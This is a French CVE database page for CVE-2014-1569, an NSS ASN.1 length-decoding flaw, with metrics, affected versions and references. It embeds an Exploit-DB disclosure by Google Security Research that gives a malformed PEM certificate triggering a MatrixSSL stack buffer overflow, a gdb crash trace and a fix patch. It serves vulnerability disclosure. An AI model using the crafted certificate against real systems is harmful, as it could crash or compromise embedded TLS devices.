CVE-2014-1569 : Détail

CVE-2014-1569

1.87%V3
Network
2014-12-15
16h27 +00:00
2017-09-21
07h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The definite_length_decoder function in lib/util/quickder.c in Mozilla Network Security Services (NSS) before 3.16.2.4 and 3.17.x before 3.17.3 does not ensure that the DER encoding of an ASN.1 length is properly formed, which allows remote attackers to conduct data-smuggling attacks by using a long byte sequence for an encoding, as demonstrated by the SEC_QuickDERDecodeItem function's improper handling of an arbitrary-length encoding of 0x00.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 46435

Date de publication : 2019-02-19 23h00 +00:00
Auteur : Google Security Research
EDB Vérifié : Yes

I happened to notice that a public X.509 certificate testcase for CVE-2014-1569 caused a stack buffer overflow in MatrixSSL. I cleaned up the testcase a bit, to make a better demonstration. You can test it with the certValidate tool that comes with MatrixSSL. $ gdb -q --args matrixssl/matrixssl/test/certValidate stackbufferoverflow.pem Reading symbols from matrixssl/matrixssl/test/certValidate...done. (gdb) r Starting program: matrixssl/matrixssl/test/certValidate stackbufferoverflow.pem [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Loaded chain file stackbufferoverflow.pem [0]:berserk.filippo.io [1]:(null) WARN subject not provided, SUBJ validation will be skipped Program received signal SIGSEGV, Segmentation fault. 0x00005555555c5164 in pubRsaDecryptSignedElementExt (gdb) bt #0 0x00005555555c5164 in pubRsaDecryptSignedElementExt #1 0x4141414141414141 in ?? () #2 0x0000000000000000 in ?? () I believe any client or server that validates certificates will be affected by this, and as MatrixSSL is usually used in embedded devices where mitigations are usually not quite as thorough as modern distributions, exploitation might not be difficult. The bug is that pubRsaDecryptSignedElementExt() uses a fixed size stack buffer, but then doesn't check if the key size exceeds it. The patch below should solve it. diff --git a/crypto/pubkey/rsa_pub.c b/crypto/pubkey/rsa_pub.c index f1d57e0..fa36e42 100644 --- a/crypto/pubkey/rsa_pub.c +++ b/crypto/pubkey/rsa_pub.c @@ -63,6 +63,12 @@ int32_t psRsaDecryptPubExt(psPool_t *pool, return PS_ARG_FAIL; } + if (*outlen < key->size) + { + psTraceCrypto("Error on bad outlen parameter to psRsaDecryptPub\n"); + return PS_ARG_FAIL; + } + ptLen = inlen; /* Raw, in-place RSA decryption. */ I'm filing this issue just for tracking, as the testcase is already public I just went ahead and created a public issue: https://github.com/matrixssl/matrixssl/issues/26 It looks like the maintainers are preparing to publish version 4.0.2 to correct this bug: https://github.com/matrixssl/matrixssl/commit/1fe26f3474706fc2dd4acd42a99167171dc34959 -----BEGIN CERTIFICATE----- MIID+DCCAuCgAwIBAgIIAAAAAAAAAAAwDQYJKoZIhvcNAQEFBQAwYzELMAkGA1UEBhMCVVMxITAf BgNVBAoTGFRoZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xNjA1MDUxNDUwMzMAFw0xNzA1MDUxNDU1MzMA MHMxCzAJBgMAAAAAAgAAMRIwEAYDAAAAAAkAAAAAAAAAAAAxGzAZBgMAAAAAEgAAAAAAAAAAAAAA AAAAAAAAADEWMBQGAwAAAAANAAAAAAAAAAAAAAAAADEbMBkGA1UEAxMSYmVyc2Vyay5maWxpcHBv LmlvMIIAADANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAIDAAAAo4EAMIGcMAAGA1UdDwEBAAQAAwIAADAABgNVHSUEADAUBggAAAAAAAAAAAYI AAAAAAAAAAAwAAYDVR0TAQEABAAwADAABgNVHQ4EAAQUAAAAAAAAAAAAAAAAAAAAAAAAAAAwHwYD AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwHQYDAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAMA0GCSqGSIb3DQEBBQUAA4IBAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoU9YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAIRcuKDsOIw8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA -----END CERTIFICATE----- -----BEGIN CERTIFICATE----- MIIEADCCAuigAwIBAgIBADANBgkqhkiG9w0BAQUFADBjMQswCQYDVQQGEwJVUzEh MB8GA1UEChMYVGhlIEdvIERhZGR5IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBE YWRkeSBDbGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA0MDYyOTE3 MDYyMFoXDTM0MDYyOTE3MDYyMFowYzELMAkGA1UEBhMCVVMxITAfBgNVBAoTGFRo ZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASAwDQYJKoZIhvcNAQEBBQADggEN ADCCAQgCggEBAN6d1+pXGEmhW+vXX0iG6r7d/+TvZxz0ZWizV3GgXne77ZtJ6XCA PVYYYwhv2vLM0D9/AlQiVBDYsoHUwHU9S3/Hd8M+eKsaA7Ugay9qK7HFiH7Eux6w wdhFJ2+qN1j3hybX2C32qRe3H3I2TqYXP2WYktsqbl2i/ojgC95/5Y0V4evLOtXi EqITLdiOr18SPaAIBQi2XKVlOARFmR6jYGB0xUGlcmIbYsUfb18aQr4CUWWoriMY avx4A6lNf4DD+qta/KFApMoZFv6yyO9ecw3ud72a9nmYvLEHZ6IVDd2gWMZEewo+ YihfukEHU1jPEX44dMX4/7VpkI+EdOqXG68CAQOjgcAwgb0wHQYDVR0OBBYEFNLE sNKR1EwRcbNhyz2h/t2oatTjMIGNBgNVHSMEgYUwgYKAFNLEsNKR1EwRcbNhyz2h /t2oatTjoWekZTBjMQswCQYDVQQGEwJVUzEhMB8GA1UEChMYVGhlIEdvIERhZGR5 IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBEYWRkeSBDbGFzcyAyIENlcnRpZmlj YXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD ggEBADJL87LKPpH8EsahB4yOd6AzBhRckB4Y9wimPQoZ+YeAEW5p5JYXMP80kWNy OO7MHAGjHZQopDH2esRU1/blMVgDoszOYtuURXO1v0XJJLXVggKtI3lpjbi2Tc7P TMozI+gciKqdi0FuFskg5YmezTvacPd+mSYgFFQlq25zheabIZ0KbIIOqPjCDPoQ HmyW74cNxA9hi63ugyuV+I6ShHI56yDqg+2DzZduCLzrTia2cyvk0/ZM/iZx4mER dEr/VxqHD3VILs9RaRegAhJhldXRQLIQTO7ErBBDpqWeCtWVYpoNz4iCxTIM5Cuf ReYNnyicsbkqWletNw+vHX/bvZ8= -----END CERTIFICATE-----

Products Mentioned

Configuraton 0

Mozilla>>Network_security_services >> Version To (including) 3.16.2.3

Mozilla>>Network_security_services >> Version 3.16.2.0

    Mozilla>>Network_security_services >> Version 3.16.2.1

    Mozilla>>Network_security_services >> Version 3.16.2.2

    Mozilla>>Network_security_services >> Version 3.17.0

      Mozilla>>Network_security_services >> Version 3.17.1

      Mozilla>>Network_security_services >> Version 3.17.2

      Références

      http://www.securitytracker.com/id/1032909
      Tags : vdb-entry, x_refsource_SECTRACK
      http://www.debian.org/security/2015/dsa-3186
      Tags : vendor-advisory, x_refsource_DEBIAN